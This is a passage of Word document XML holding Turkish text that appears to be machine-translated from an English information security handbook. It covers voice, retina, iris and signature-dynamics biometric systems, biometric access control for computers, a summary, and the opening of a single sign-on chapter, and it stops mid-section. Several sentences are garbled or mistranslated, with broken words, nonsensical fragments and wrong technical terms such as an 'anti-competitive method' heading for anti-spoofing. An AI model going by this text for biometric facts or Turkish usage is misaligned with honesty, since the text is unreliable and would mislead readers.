        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00395E54">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ses Düzeneği Sistemleri Yedi nazal ton parametresi, gırtlak ve boğaz titreşimleri ve ses kaynaklı hava basıncı, ses ve diğer sensörler tarafından yakalanır. Kayıt Prosedürü ve Zaman Çoğu ses sistemi, standart bir telefona benzer ekipman kullanır. Belirtildiği gibi, konu ahizeyi kaldırır ve telefon tuş takımında bir PIN girer. Telefon ahizesinde işaretlendiğinde, kişi kendi PIN'ini, adını veya diğer dört ila altı kelimelik bir cümle olabilen erişim cümlesini konuşur. Geçiş işareti ve erişim ifadesi dört defa tekrarlanır. Gerekli toplam kayıt süresi iki dakikadan az. Şablon veya Dosya Boyutu Sesli kullanıcılar sistem üreticisine bağlı olarak 1000 ila 10.000 bayt arasında değişir. Kullanıcı İşlemleri Gerekli Şu anda, ses sistemleri yalnızca tanımlayıcılar gibi çalışır. Kullanıcı, telefon tipi tuş takımındaki PIN kodunu girerek tanımlama yapar. Telefon ahizesinde işaretlendiği gibi (“lütfen erişim cümlenizi söyleyin” diyen kaydedilmiş ses), telefon ahizesi sensörlerine konuşur. Sistem Yanıt Süresi Sesli cevap (yani, “kabul edildi, lütfen girin” veya “yetkili değil”) ahize ile sağlanır. Bazı sistemler görsel uyarı içerir (örneğin, kırmızı ve yeşil ışıklar veya LED'ler). Toplam işlem süresi 10 ila 14 saniyeye kadar sürebilir. Sahteciliğe Karşı Yöntem “p” veya “t” sesleri söylendiğinde artan hava basıncını ölçmek de dahil olmak üzere çeşitli yöntemler kullanılır. Bazı karmaşık sistemler, kullanıcının her kullanımında, on veya daha fazla kayıtlı kelime listesinden farklı sözcükleri farklı bir sırada konuşmasını gerektirir. Doğruluk Sandia National Laboratories, test ettikleri iki sistem için yüzde 10'dan daha büyük çaprazlama hatalarını bildirdi. Diğer ses testleri planlanmaktadır. Alan Tarihçesi 100'den fazla sistem kurulmuş olup, 1000'den fazla kapı erişim ünitesi, kolejlerde, hastanelerde, laboratuvarlarda ve merkezlerde. Sorunlar Tecrübeli Arka Plan gürültüsü ses sistemlerinin doğruluğunu etkileyebilir. Erişim sistemleri, yoğun, yüksek trafikli ve yüksek gürültü seviyeli sitelere girme eğilimindeki girişlerde, koridorlarda ve girişlerde bulunur. Eşsiz Sistem Yönleri Bazı ses sistemleri, dahili sistem olarak veya diğer sistem kullanıcıları için mesaj bırakmak için de kullanılabilir. Ses tabanlı biyometrik tanımlama sistemleri üreten birkaç şirket var.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00395E54" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00395E54">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Retina Desen Sistemi Sistem, görüntüyü elde etmek için bir kamera kullanarak göz küresinin iç arka kısmında retinadaki kan damarı deseninin elemanlarını kaydeder. Kayıt Prosedürü ve Süresi Konu gözünü sistem açıklığından bir ya da iki cm uzağa yerleştirerek, açıklıkta ortalanmış ünite içinde yanıp sönen yeşil bir nokta tutmaya ve hareketsiz kalmaya yönlendirilir. Ultra düşük yoğunluklu görünmez ışık, retinanın üzerinde 450 derecelik bir dairede 320 nokta okumanızı sağlar. Birimin tuş takımına bir PIN girilir. Gerekli toplam kayıt süresi iki dakikadan az. Şablon veya Dosya Boyutu Retina deseni sayısallaştırılmış dalga biçimi 96 baytlık bir şablon olarak saklanır. Kullanıcı İşlemleri Gerekli Doğrulanıyorsa, kullanıcı tuş takımındaki PIN'i girer. Bir göz açıklığın önüne getirildiğinde ve darbeli yeşil nokta üzerine ortalandığında sistem otomatik olarak veri alır. Kabul veya kabul edilmeme, LCD ekranda gösterilir. Sistem Tepki Süresi Doğrulama sistemi karar süresi yaklaşık 1,5 saniyedir. Tanınan karar süresi, 1.500 katmanlı bir veri tabanı ile beş saniyeden daha kısa. Ortalama işlem süresi dört ila yedi saniyedir. Rekabet Karşıtı Yöntem. Üreticiye göre, sistem “kalıp verilerini elde etmek için canlı, odaklanmış bir göz gerektiriyor”. Doğruluk Sandia Ulusal Laboratuvarları’nın önceki retina modelinde yaptığı test, yanlış kabul ve% 1,5’lik çapraz hata oranı vermedi. Yeni model olan System 2001'de de benzer bir performans sergiliyor. Alan Tarihçesi Yüzlerce orijinal dürbün tipi ünite, bu modeller kesilmeden önce hazırlandı. Kolejlerde, laboratuvarlarda, devlet tesislerinde ve hapishanelerde erişim kontrolü ve tanımlanması için kullanılmıştır. Yeni model, System 2001 şimdi satışta.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00395E54">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Yaşanan Sorunlar Terleyen ya da sulanan kişilerin önceki modellerin gözlerine nem bırakabileceği için, bazı kullanıcılar vücut sıvılarının transferi yoluyla bir hastalık edinmekten endişe duyuyorlardı. Önceki modeller model verilerini elde etmek için kırmızı ışık ışını kullandıklarından, bazı kullanıcılar “lazer” den olası göz hasarı konusunda endişe duyuyorlardı. Herhangi bir kullanıcının gerçekten bu sistemleri kullanarak yaralandığını ya da hastalandığını iddia etmiyordu. Diyabet ve kalp krizi gibi bazı fiziksel koşullar, bu sistem tarafından tespit edilebilecek retina düzeninde değişikliklere neden olabileceğinden, bazı kullanıcılar yönetimin zararlarına kullanabilecekleri yetkisiz tıbbi bilgi alacağından endişe duyuyorlardı. Retina sistemi bilgilerinden kaynaklanan hiçbir çalışan personel eylemi vakası rapor edilmemiştir. Eşsiz Sistem Yönleri Bazı potansiyel sistem kullanıcıları, yeni Sistem 2001'i kullanmaktan kaynaklanan potansiyel göz hasarı konusunda endişe duymaya devam ediyorlar. Bunu göremeseler bile, sistemin retina modelini okumak için gözün içine bir ışın yansıttığını söylüyorlar. Retina bazlı tanımlama patentleri, EyeDentify Inc. şirketine aittir. İris Desen Sistemi İris (yani, öğrenciyi çevreleyen gözün renkli kısmı), zengin ve eşsiz desen, çukur, çil, çentik, çentik, ilmek, halka, koronlar, oluklar ve damarlar. Görüntüler, bir kameraya benzer şekilde saniyede 30 görüntü yakalayan standart 1/3 inç CCD video kamera ile elde edilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00395E54" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00395E54">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Kayıt İşlemi ve Süresi Konu, gözünün aynaya benzeyen bir LCD ekranı kullanaraküne bakar, görüntüyü yönlendirildiği şekilde merkezler ve odaklar. Sistem, iris planlamaunda analiz bölgeleri yaratır, bölgelerin bulunduğu yerlerde bulunur ve bir IrisCode sitesinde. Sistem üç görüntü işliyor, en çok temsilci seçiyor ve operatörün onayı üzerine yönlendirer. Yönetici veri tabanına bir PIN eklenir (yani isim, adres). Gerekli toplam kayıt süresi iki dakikadan az.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00395E54" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00395E54">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Şablon veya Dosya Boyutu IrisCode, 256 byte kaplar.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00395E54" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00395E54">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Kullanıcı İşlemleri Gerekli İriScan sistemi bir kontrol cihazı olarak çalışabilir, ancak normalde tam işlevlerde olduğundan bu durumda bu konuda doğru olanlarınız daha hızlı gerçekleştirir. Kullanıcı başlatıldığında basar, bilgisayarda açılıp kapatılmamış, optik bir üniteyi yatırır ve gözünün LCD'sini geri ayarlayarak, bakar, görüntüyü ortalar ve odaklar. Sistem bir onaylayıcı olarak bağlanabiliyor, bir tuş takımı veya kart okuyucu bağlanabiliyor.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00395E54" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00395E54">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Sistem Tepki Süresi Belirlenen ya da kararsız görsel ve sesli uyarısı, özellikinin boyutuna bağlı olarak bir ila iki saniye içinde oluyorir. Toplam çıkış süresi (diğer bir sözcük, başlatıldı).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00395E54" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00395E54">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Sahteciliği Önleme Yöntemi Sistem, gözün doğal olarak birleşik fiziksel faktörlerini kullanarak veri girişini canlı bir kişiden yapıyoruz.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00395E54" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00395E54">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Doğruluk Sandia National Laboratories'in bir hazırlık modelinin testinde yanlış bir kabul, düşük hatalı reddedilme ve “son derece iyi performans göstermiş” bir sistem burada. Sandia şu anda testte olan bir üretim lideri sahip. İngiliz Telekomünikasyon sistemi son sistemi çeşitli modlarda test etti ve mühendislik günlüğünde bir rapor yayınlayacak. 250.000'den Fazla IrisCode karşılaştırmasında Yüzde 100 doğru performans rapor ettiler. “İris tanıma güvenilir ve sağlam bir biyometrik. Sunulan onu gözüne kaydetdi. Yanlış kabul edilmedi ve verilen her şey başarılı bir şekilde tanımlandıdı. “Diğer testler Yüzde 0,5'ten düşük Bir çaprazlama hata rate bildirmiştir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00395E54" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00395E54">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Saha Tarih Birimleri, askeri ve devlet kuruluşlarında, bankalarda, telekomünikasyon şirketlerinde, cezaevlerinde ve hapishanelerde, eğitim kurumlarında, imalat şirketlerinde ve güvenlik şirketlerinde yönetim ve personel tanımlaması için orada. Deneyimli Sorunlar Bu kamera tabanlı bir sistemde, optik ünite güneşin doğrudan açıklığa parlamayacağı şekilde konumlandırılmıştır. Eşsiz Sistem Özellikleri Gözün iri, yaşam boyunca bir yaşından itibaren zaten hiç değişmeyen sabit bir organdır. Buradaki, bir kez kaydolduktan sonra, belli göz yaralanmaları veya hastalıkları bulunmayan bir kişi her zaman verilecektir. IRIScan Inc., dünya çapında iris tanıma Teknolojisi Konusunda Patent sahibidir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00395E54">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>İmza Dinamiği Sistemleri İmza darbesi hızı, konumu ve basıncı, kalem, ekran rengi veya yazı tabletindeki küçük sensörler olduğu sırada. Kayıt İşlemi ve Süresi Belirtildiğinde, konuya göre belirle, plan veya hassas tableti kullanarak normal bir imza imzalar. Beş imzalayarak. Bazi Sistemler, şablon Olarak zamana Karşı üç koordinat setini yazdıklarınız kaydedilecek.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00395E54">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Şablonlar, imza çoğaltılmasını engellemek için şifrelenir. Bir tuş takımı kullanarak bir PIN eklenir. Gerekli toplam kayıt süresi iki dakikadan az. Şablon veya Dosya Boyutu Kayıt imzası girişinin 1000 ila 1500 bayt bir şablona ortalaması alınır. Kullanıcı İşlemleri Gerekli Kullanıcı, bir tuş takımındaki veya kart okuyucusundaki PIN girişi yoluyla tanımlamayı sağlar. İmza daha sonra verilen araç ya da tablet kullanılarak yazılır. Bir kayıt için imzanın bir kopyası gerekli değilse, bazı sistemler kağıdın kullanılmadan kalemin kullanılmasına izin verir. Sistem Tepki Süresi Doğrulanmış veya doğrulanmamış kararın görsel ve sesli uyarısı yaklaşık bir saniye sonra telaffuz edilir. Toplam çıkış süresi, imzayı yazmak için gereken zamana bağlı olarak beş ila on saniye aralığındadır. Rekabet Karşıtı Yöntem Bu özellik imza dinamiği sistemleri için geçerli değildir. Doğruluk Veri toplama pilot projelerde ve beta test alanlarında devam etmektedir. Mevcut imza dinamikleri biyometrik sistemleri henüz bağımsız bir kuruluş tarafından test edilmemiştir. Alan Tarihçesi Medikal, ilaç, bankacılık, imalat ve devlet alanlarındaki kuruluşlar </w:t>
      </w:r>
      <w:r w:rsidRPr="00395E54">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>tarafından işletilen bir düzine sistemde yaklaşık 100 birim kullanılmaktadır. Sorunlar Daha önce laboratuvar ve kontrollü testler sırasında iyi performans gösteren tecrübeli imza dinamiği sistemleri, zorlu operasyonel kullanımlara dayanmıyordu. Başlangıçta kabul edilebilir doğruluk ve güvenilirlik oranları aylarca sistem kullanımından sonra bozulmaya başladı. Kesin arıza bilgisi bulunmamakla birlikte, kalem hızı, basıncı ve yönündeki dakika değişikliklerini ölçmek için gereken küçük, süper hassas sensörlerin halkın sert kullanımına dayanmadığına inanılmaktadır. Mevcut imza sistemleri neslinin bu eksikliklerin üstesinden gelip gelmediğini söylemek için çok erken. Benzersiz Sistem Yönleri Çeşitli biyometrik kimlik sistemleri arasında, bankacılar ve avukatlar imza dinamiklerini savunuyorlar çünkü yasal belgeler ve finansal taslaklar tarihsel olarak imza ile doğrulandı. İmza dinamikleri tanımlama sistemleri, erişim kontrolü ve diğer güvenlik uygulamaları için aday olarak görülmemektedir. İmza dinamiği sistemleri üreten birkaç şirket var.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00A80923" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
      </w:pPr>
      <w:bookmarkStart w:id="56" w:name="_Toc9978704"/>
      <w:bookmarkStart w:id="57" w:name="_Toc9979186"/>
      <w:r w:rsidRPr="00A80923">
        <w:t xml:space="preserve">1.24. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A80923">
        <w:rPr>
          <w:rStyle w:val="Balk1Char"/>
        </w:rPr>
        <w:t>Information Security Applications</w:t>
      </w:r>
      <w:bookmarkEnd w:id="56"/>
      <w:bookmarkEnd w:id="57"/>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidRPr="00E167D9">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ilgi ve fonlar, bu alanlardaki kayıplar, fiziksel hırsızlık ve sahtekarlıktan kaynaklanan zararları hızla aştı. Hayati programlara ve verilere erişen ve hayati fonksiyonlar yerine getiren bilgisayar operatörlerinin pozitif tanımlanması, bu kayıpları ortadan kaldırmanın tek yolu olduğu için zorunlu hale geliyor. Bilgisayarın açılmasını ve programlanmasını kontrol etmek için parolaların ve PIN'lerin kullanımı ve veri araması, kontrol edilmekten daha iyidir, ancak daha önce tartışılan tüm eksikliklere tabidir. Basit, hatırlaması kolay kodlar, “kötü adamları” çözmek için kolaydır. Rasgele veya geniş kodlar hatırlamak zordur ve neredeyse her zaman rahat ve savunmasız bir yere yazılır. Ek olarak ve en önemlisi, bu kontrollerin yalnızca operasyonun başında veya programa veya dosyalara erişim sırasında etkin olmasıdır. İhtiyaç duyulan şey, bilgisayar klavyesinde oturan kişinin sürekli, şeffaf ve pozitif bir şekilde tanımlanmasını sağlayabilen bir biyometrik sistemdir. Bu sistem, operatör bu bilgisayarı veya terminali kullanmaya yetkili bir kişi olarak pozitif bir şekilde tanımlanana kadar bilgisayar açılışını keser. Bu sistem aynı zamanda, operatör bu tür erişime izin verilen bir kişi olarak pozitif olarak tanımlanıncaya kadar kontrollü programların veya verilerin kullanımını engelleyecektir. Bu sistem aynı zamanda, bu kontrollü programlar veya dosyalar kullanımda olduğu sürece operatörün sürekli, periyodik (örneğin, her 30 saniyede bir) pozitif tanımlamasını sağlayacaktır. Bu sistem periyodik bir kontrol sırasında yetkili operatörün varlığını doğrulamazsa, ekran verilerden temizlenebilir. Bu sistem yetkisiz veya tanımlanmamış bir operatörün varlığını doğrularsa, alan ve program kapatılabilir. Açıkçası, böyle bir sistemin uygulanabilirliği, kurcalamayı, yetkisiz tanımlayıcı dosyaların yerleştirilmesini veya baypas edilmesini önlemek için etkili duvarları ve programcı erişim kontrolleri olan yazılıma bağlıdır. Ancak, böyle bir yazılım zaten var. Ayrıca, oturum açma şifresini değiştiren bir biyometrik tanımlama sistemi zaten mevcuttur. Henüz mevcut değil, uygulanabilir, bağımsız bir şekilde test edilmiş, devam eden ve şeffaf bir operatör tanımlama sistemidir. Şu Anda Kullanılabilen Sistem Identix’in TouchSafe ™’si, bilgisayarda oturum açan veya kapatılan kayıtlı kişilerin onayını sağlar. IBM uyumlu bir eklenti elektronik kartı ve kablo içeren 5.4 ¥ 2.5 ¥ 3.6 inç ger ngerprint okuyucu ünitesi ile birlikte gelir. Bu ünitenin daha kontrollü bir çalışma ortamı ve sınırlı bir kullanıcı listesi nedeniyle daha önce tarif edilen normal parmak izi erişim kontrol </w:t>
      </w:r>
      <w:r w:rsidRPr="00E167D9">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>sistemlerinden daha doğru olması beklenebilir. Ancak, devam eden veya saydam bir tanımlama sağlamaz. Tanımlama her gerekli olduğunda, operatör aktiviteyi durdurmalı ve okuyucuya bir numara yerleştirmelidir. Geliştirilmekte Olan Sistemler Sadece kamera tabanlı bir sistem gerekli devam eden ve saydam tanımlamayı sağlayabilir. Bilgisayar monitörünün üst köşesine yerleştirilmiş küçük bir video kamera ile sistem, operatör kimliğini her 30 veya 60 saniyede bir kontrol etmek üzere programlanabilir. Operatörün ekrana sık sık bakması beklenebileceğinden, bir yüz veya iris tanımlama sistemi, operatörün çalışmasını hiç kesmeden etkili olacaktır. Böyle bir sistem, kabul edilebilir bir görüntü elde etmek ve operatörü tanımlamak için 15 saniyelik bir gözlem penceresine sahip olacak şekilde ayarlanabilir. Operatör ekrana bakmadıysa veya 15 saniye boyunca mevcut olmasaydı, ekran ekran koruyucusu ile silinirdi. Sistem gözlem modunda kalır, böylece operatör klavyeye geri döndüğünde veya ekrana bakıp tanımlandığında ekran geri yüklenir. Klavyedeki operatöre yetki verilmemiş veya tanımlanmamışsa, program ve dosyalar kaydedilir ve kapatılır. Bu yetenekleri sağlama potansiyeli olan ilk gelişme sistemi Miros Inc.'in yüz tanıma sistemidir. Miros, TrueFace adlı bir ürün grubu üzerinde çalışmaktadır. Şu anda, Miros’un gelişen sistemlerinin performansı ve doğruluğu ile ilgili bağımsız bir test verisi mevcut değildir. Yüz tanıma araştırması uzun yıllardır sürmekte ancak başarılı bir sistem henüz pazara ulaşmamıştır. Ayrıca, biyometrik tanımlama endüstrisi, alan kullanımında kabul edilebilir sonuçlar verememiş umut verici gelişmelere sahiptir. Miros’un gelişmeleriyle ilgili sonuçlar tanınmış bir bağımsız kuruluş tarafından yapılan performans ve doğruluk testlerini beklemelidir. IriScan Inc., istenen bilgisayarı veya bilgi erişim kontrolü yeteneklerini sağlayabilen bir iris tanıma sistemi geliştirmenin ilk aşamalarındadır. IriScan’ın ispatlanmış doğruluğu, bu gelişime en doğru bilgi kullanıcı tanımlama sistemi olma potansiyeline sahiptir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
      </w:pPr>
      <w:bookmarkStart w:id="58" w:name="_Toc9978705"/>
      <w:bookmarkStart w:id="59" w:name="_Toc9979187"/>
      <w:r w:rsidRPr="00467D8D">
        <w:t>1.25.Özet</w:t>
      </w:r>
      <w:bookmarkEnd w:id="58"/>
      <w:bookmarkEnd w:id="59"/>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00467D8D">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Hızlı, doğru, uygun maliyetli biyometrik tanımlama sistemleri dönemi geldi. Toplumsal faaliyetler bireylerin ve kuruluşların varlıklarını, bilgilerini ve hatta bazen varlıklarını bile tehdit ediyor. Anlık, olumlu kişisel kimliklendirme, toplumun kaynaklarına erişimin kontrol edilmesinde ve korunmasında kritik öneme sahip bir adımdır. Etkili araçlar şimdi mevcuttur. Günümüzde önemli sayıda biyometrik tanımlama sistemi üreten ve satan bir düzineden fazla şirket vardır. Daha da fazla organizasyon biyometrik araştırma ve geliştirme çalışmaları yürütüyor ve pazara girmeyi umuyor ya da zaten az sayıda birim satıyor. Tüm biyometrik sistemler ve teknolojiler genel olarak eşit derecede etkili değildir ve özellikle tüm uygulama gereksinimlerini karşılamada etkili değildir.Güvenlik yöneticilerinin, seçim yapmadan önce aday biyometrik sistemleri araştırırken dikkatli ve dikkatli olmaları tavsiye edilir. Bağımsız test sonuçları ve benzer uygulamalara sahip mevcut kullanıcıların raporları tavsiye edilir. Yerinde testler istenmektedir. Biyometrik tanımlama sisteminin seçiminde ve kurulumunda özenli ve titiz olanlar, varlık koruma seviyelerinde büyük artışlar gerçekleştireceklerdir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
      </w:pPr>
      <w:bookmarkStart w:id="60" w:name="_Toc9978706"/>
      <w:bookmarkStart w:id="61" w:name="_Toc9979188"/>
      <w:r w:rsidRPr="00467D8D">
        <w:t>2. Kuruluş için Tekli Oturum Açma</w:t>
      </w:r>
      <w:bookmarkEnd w:id="60"/>
      <w:bookmarkEnd w:id="61"/>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00467D8D">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
